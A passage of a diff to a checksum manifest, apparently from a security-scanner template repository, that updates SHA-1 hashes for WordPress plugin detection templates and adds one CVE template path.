helpers/wordpress/plugins/wordpress-seo.txt:930e8b88830c61ff86b6e414b42dfa304520f47e helpers/wordpress/plugins/worker.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/wp-crontrol.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/wp-fastest-cache.txt:2e3c1317d99e9b751581574ebe5b0f4a32eea831 -helpers/wordpress/plugins/wp-file-manager.txt:8c4e6ce593239d9464a2d3eb48692924898625be +helpers/wordpress/plugins/wp-file-manager.txt:8cfcb8ec5ab4edb8770c2187b596a73c174e511f helpers/wordpress/plugins/wp-google-maps.txt:a7271cc82e11f6991ba3e441b86276cbfd98f338 helpers/wordpress/plugins/wp-mail-smtp.txt:66eed0a7a5e1364c307f42f580a7ff24e731f1a0 helpers/wordpress/plugins/wp-maintenance-mode.txt:b8693a006e8d4b4817ba2402c67eff9e73383a45 @@ -944,7 +945,7 @@ helpers/wordpress/plugins/wp-pagenavi.txt:53203701692767a1c2a24e47d94a090230bd8b helpers/wordpress/plugins/wp-reset.txt:0676d107698477ab3fa1a4f94a324657de0f87fd helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt:4fde6b87a266eece4b77ee2df16db81507c218b0 helpers/wordpress/plugins/wp-rollback.txt:9900ba1358421f36ec71073f65f6a41eed98f7c2 -helpers/wordpress/plugins/wp-seopress.txt:db63fca627057d07dbd8d5064a623a9cd31006f9 +helpers/wordpress/plugins/wp-seopress.txt:3284e1bfed2e6fe80a1da5dd0ea07afa904b0f37 helpers/wordpress/plugins/wp-sitemap-page.txt:b600bf3dacb5d620338f6412a343d3349ec570bf helpers/wordpress/plugins/wp-smushit.txt:c7f53e91bcbfae4c21042e9d0833d24ed2cfc08c helpers/wordpress/plugins/wp-statistics.txt:50a1dda2c7175fa98585515877bea64429587cc8 @@ -3531,6 +3532,7 @@ http/cves/2024/CVE-2024-6289.yaml:83d044a4385a60a024a6dee9f02644f4db94a4b7 http/cves/2024/CVE-2024-6587.yaml:3b9b74b62b5fee24b9ae9e2138affc55ffabe1d3 http/cves/2024/CVE-2024-6646.yaml:2e73ea26a9329272c114fbee69cc648183fda206 http/cves/2024/CVE-2024-6746.yaml:d4ab2b4730c55e4aa424d56e07cd03f9b2c26859 +http/cves/2024/CVE-2024-6922.yaml:ad9284de1c396326ccdf10b44798a772202b97f7 http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda @@ -7332,230 +7334,230 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:5fbb3b0f23501107c5a28c2c1f5e01f176ab5541 -http/technologies/wordpress/plugins/add-to-any.yaml:6dee4b80182d0c53e02bba619981dd38952d78dd -http/technologies/wordpress/plugins/admin-menu-editor.yaml:6e20c24b766046959045fb5aba1e66680a20e02c +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:a826be38b4e6cdfc941322092e45d81ded75c4eb -http/technologies/wordpress/plugins/akismet.yaml:14c71fbf07f718230de79ee756387c1479645853 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c986fde0283ceae76ab74876612418330de23167 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:28d92430b2a848b0e3d13dbf392fe2a98b235ede -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:2662f5264d26239606924e6738eb1966850749b3 -http/technologies/wordpress/plugins/amp.yaml:9d65fdba95d92af8bb08bf22cf5010de6732f67d -http/technologies/wordpress/plugins/antispam-bee.yaml:4af4a611b9b0fbf4a2e34773f9168ab01a11df53 -http/technologies/wordpress/plugins/astra-sites.yaml:09b896f2ff367b870d4f4b448496a69fcdcdf8cd +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:ff962bafe73877f19d5c6e2f3e91357602a94074 -http/technologies/wordpress/plugins/backwpup.yaml:d0a9a3683b0f23303272dcc6e95464b64a7c1a86 -http/technologies/wordpress/plugins/better-search-replace.yaml:3d6b718627ac567e05cff994820befd26a3f7453 -http/technologies/wordpress/plugins/better-wp-security.yaml:1fbbba935ab69e6e3cba8d29c2bb225e75bf4aec -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:42d86e0f42099409482f80381d9a3bd585317840 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:b3e6418999ae3c08437424377c7fc07066ce0267 -http/technologies/wordpress/plugins/breeze.yaml:d588e64d9d5a22ca7c79486e456a95e28494706d -http/technologies/wordpress/plugins/broken-link-checker.yaml:5a9715ac85d9aef8f1ea5181f689d00a6d8006ae -http/technologies/wordpress/plugins/chaty.yaml:28b205c7ce880802dd3e3b051250a83cd2ad63ec -http/technologies/wordpress/plugins/child-theme-configurator.yaml:512d32b9e4baeed953c87cdd6e28eb32df877c6d -http/technologies/wordpress/plugins/classic-editor.yaml:3c866b1191c25313e50a5e0f11bad80592083a1d -http/technologies/wordpress/plugins/classic-widgets.yaml:95bd930426e49eaf692aef04b3370125dfc40cdb -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:400689b32f39c2a39ba94fc1436c8a417b113862 +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:e2a811d1e49e2e812eabcc744e27d0e5ed86f88b -http/technologies/wordpress/plugins/coblocks.yaml:4b15c2360e6ecdc84df1019b1a21375e02d150f6 -http/technologies/wordpress/plugins/code-snippets.yaml:84de073bf5b09fd6c5080450893f5fbfa320d91c -http/technologies/wordpress/plugins/coming-soon.yaml:d14156a8e7ab885f94703d3ea738a72555a48703 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:277b5a987c4a8ebf1cb0a674e0fc8691135b62cf -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:e9478c74bc7020b77e2114cd9c1256a4aaeb4ad2 -http/technologies/wordpress/plugins/contact-form-7.yaml:ffaa23d9689b5277ecaa10155e50b0484b4accb5 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ea49d2c052f4cf1cedd396850348fcf7f481ce36 -http/technologies/wordpress/plugins/cookie-law-info.yaml:956cc2f1a3bf6491efbb8827d81528ecf8d55601 -http/technologies/wordpress/plugins/cookie-notice.yaml:656150bad76c422818177ab6f86fccf2f56c9792 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:cd5c221a503a693e43db4ce3b7b96b4f1703108a -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:1d6ec36c1242c2353a5c8b6ef1ee5121ca5ac8bd -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:c027986cb86b6b12ddcb5ababbb47d987f272dd4 -http/technologies/wordpress/plugins/custom-css-js.yaml:82ad4053cdbba27511d542e085cdf88cfb64bb72 -http/technologies/wordpress/plugins/custom-fonts.yaml:38f79f96362284fd7945ea0ae18e540643d5850d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:f41835593a0002b189494f6becf98f4021ff8e5f -http/technologies/wordpress/plugins/disable-comments.yaml:050df11e2b9a67bf3778427dc70f1d8c76f109e2 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:9bab6656e9a8a9bc8258d7c439c3bc72421ae904 -http/technologies/wordpress/plugins/duplicate-page.yaml:95643352e549ec66f9b96cd1988c35672958883e -http/technologies/wordpress/plugins/duplicate-post.yaml:2ef20a88e0946a017b4c268a88229e43358c7042 -http/technologies/wordpress/plugins/duplicator.yaml:0ba9d6b3cc19bf902eaed15c794a57501d6a8f97 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:bab2eb71c421641a6256794b50be7a43a0a5948d +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:9c24dc8d6ea56a7a031323b628b82b90bd686d7a -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:760374efb950b47180d6cc5983c3d24da0ee8698 -http/technologies/wordpress/plugins/elementor.yaml:924a46248dca9f7c46511efac1aab6b4c65b786c -http/technologies/wordpress/plugins/elementskit-lite.yaml:4ebf35980294a78bf2eae7039ef28c3170df495f -http/technologies/wordpress/plugins/enable-media-replace.yaml:07eee6cc56f13b92206532b27c3de23cd09173aa -http/technologies/wordpress/plugins/envato-elements.yaml:7892f28212acc18b25207399fd049258b0e2329c -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:d3cf8ca31f766815093d14056df2da6ce0d6987f -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:a45975f9b1e5f33489f8293d5254b1bb392c5b53 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:6ec2f36723bcee773bae8ae0a00daeb9c4155246 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:8e1b3c0c56c54bc650d1131ec52e7531dcec501b -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:228354700f51d17f8dbc30ee42c060169337bb09 -http/technologies/wordpress/plugins/flamingo.yaml:887f322a390ca62f3ee527e998a377a8318bcf06 -http/technologies/wordpress/plugins/fluent-smtp.yaml:13fb0aa62d97d23a47038e2522406a3311fb07aa -http/technologies/wordpress/plugins/fluentform.yaml:75405bc8e73bc6ac7df3fc8d51e7974555a07480 -http/technologies/wordpress/plugins/font-awesome.yaml:5d156344a2afa662c8874ef2c094f53a37597330 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:b6e943cca55a519f081655f2fb5732ba69b6f3de -http/technologies/wordpress/plugins/formidable.yaml:34d8510ad078f263ac361f876f07170d53262402 -http/technologies/wordpress/plugins/forminator.yaml:eda85906fa592170c79358bf2b7977ebd9c16361 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:8028eb9912cf795ef39de6ac09deb006680734d6 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:cc1c3a57f54c1bc1960293a4f776ef811e3b12d6 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:25389e6ba20282bd7eb603e1f6e25f87c5808483 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:4a900d76f3142fb20b490a1be85fd502936fece3 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:2590ae4a68826ba9d8c6a58803a1291e24caa515 -http/technologies/wordpress/plugins/google-site-kit.yaml:a0ef5b4c17270f45bd6895e57f5f6588cf595694 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:064cd496db955926b6c6bb22ba47415060c58a36 -http/technologies/wordpress/plugins/gtranslate.yaml:7e0425ed43ad8e7589bca94c96c165930d88fd6b -http/technologies/wordpress/plugins/gutenberg.yaml:947002a073e70aec9f3b0917620cd69aa2b0b7d9 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:62747a50825012efc9ccc03156ee5887120472b5 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluent-smtp.yaml:f8756f30bfdc614abb6aa0cef6f395e5a96615d8 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:924e1491445165062a875506440d9d6b02cf1416 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:88c5ce53a84244d874fbc5fb4bf554758d58957e -http/technologies/wordpress/plugins/header-footer.yaml:284fec8464e438236691b40464d1054443d462ef -http/technologies/wordpress/plugins/health-check.yaml:332172403a83a394540698e28470c7c6ca56fc5f -http/technologies/wordpress/plugins/hello-dolly.yaml:742b36322231b6074fbf6a86bebb01fdd9a65561 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:411d0ec0f5c6a517608acbc6cfaca8dca784dc4c -http/technologies/wordpress/plugins/hostinger.yaml:2e1abdfb355879c64fc5f5f3e81d6d43428571e3 -http/technologies/wordpress/plugins/image-optimization.yaml:257eadf7770da46b4c00efb1036f91d6a0400897 -http/technologies/wordpress/plugins/imagify.yaml:bbde3ee46eb6835169e17ef49ec0a93f38a74e86 -http/technologies/wordpress/plugins/imsanity.yaml:e45456d8dc9c39e9849082c97157fe54d5e9000a -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:9aaec61e67842011db460a7630cbcc3b7f3e7902 -http/technologies/wordpress/plugins/instagram-feed.yaml:c3fac8d03cb18acd835b150cbc269e86649e1eb4 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:d7bfecb182c3733ad7dfe3c052cf0142fee02fba +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:aa50d5d2cf10f2040c9992a2c9e0d54468c7773d +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff +http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:3bb0029a8c3b6ebe0d58a6593860ebd3a2badcec -http/technologies/wordpress/plugins/jetpack.yaml:ae7dfc613c3bd51335d0581574515e52ced97516 -http/technologies/wordpress/plugins/kadence-blocks.yaml:e23889cd809d78e62483e9d2388189e6f3ac8f35 -http/technologies/wordpress/plugins/kirki.yaml:a00979e94c92d98148026d56afbc570d25e2a590 -http/technologies/wordpress/plugins/leadin.yaml:7b6507fcadaa4d7ee83824b5ca2482d92a823ac0 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:20dd7abb9d11b5834ff4ed02e14516404d0faeb4 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:c4a2289b6475b5baf46d6cd5dd06c383c49fdafd -http/technologies/wordpress/plugins/litespeed-cache.yaml:4426535019914ae489e5e21c323a39c4c572f2c6 -http/technologies/wordpress/plugins/loco-translate.yaml:0e901bfc3d5b3a6e30930f54f99a361d8feb0a91 -http/technologies/wordpress/plugins/loginizer.yaml:388ee09364edb458746e7d9e92fb885ccf3f1f31 +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:93185f2fe404be81f84609729462d3f3b261f0c2 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1787d70af64b7e2ac86f7373defe800131d7cd81 -http/technologies/wordpress/plugins/mailpoet.yaml:8f3532e3070d200218c7a9de7f0451241f810ba5 -http/technologies/wordpress/plugins/maintenance.yaml:7b2ec90decccf786b2dcd9455804a46b74165071 -http/technologies/wordpress/plugins/mainwp-child.yaml:e7b18b679c62caaec96fc734b54bad9427ebdaaf -http/technologies/wordpress/plugins/malcare-security.yaml:6e17906c9a4f2c3aed1ff7fb6ea6f237ce0431ee -http/technologies/wordpress/plugins/megamenu.yaml:19c8d9011038aaa48f467ca78ac5d8074e44d99d -http/technologies/wordpress/plugins/members.yaml:020759f3beb0df0032b048647d85e5d097301dd0 -http/technologies/wordpress/plugins/meta-box.yaml:8848566038b6401ce4d74f1ddbe7fa972906eb33 -http/technologies/wordpress/plugins/metform.yaml:b373e75914b27691d6ad6fbbf72208e05fb9143f -http/technologies/wordpress/plugins/ml-slider.yaml:d43954efca9d79b2df33530db7ec1fd97292799b -http/technologies/wordpress/plugins/newsletter.yaml:0beb4dbce45771c12a1538412b38ff0dfed1f00a -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a8a6970c35ac5a167d679cd6d8167be33112e34f -http/technologies/wordpress/plugins/nextgen-gallery.yaml:f0e8a3ae3cdb8cff17b37775cf02a7fa48bbb074 -http/technologies/wordpress/plugins/ninja-forms.yaml:dd2107dfaadffc033b3a4087b921305bcbb44bd7 -http/technologies/wordpress/plugins/ocean-extra.yaml:8fec86a2827e4526851154eaacb1492a947d5277 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:e82035a67ff351e66dd8e68b2e6683326e49f059 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:220297dcf79646594af0ea0029fafa700a5d3797 -http/technologies/wordpress/plugins/optinmonster.yaml:014f0a554b0685afd2ece0a024832d766e124a9a -http/technologies/wordpress/plugins/otter-blocks.yaml:31d6c8d3cf098174d7f2b572596970971abcfcd7 -http/technologies/wordpress/plugins/password-protected.yaml:beabc24efa52d4515130fee6b9a48ab26498a834 -http/technologies/wordpress/plugins/pdf-embedder.yaml:9f3e590a2f5c83383401c85cb0511aee7888f442 +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 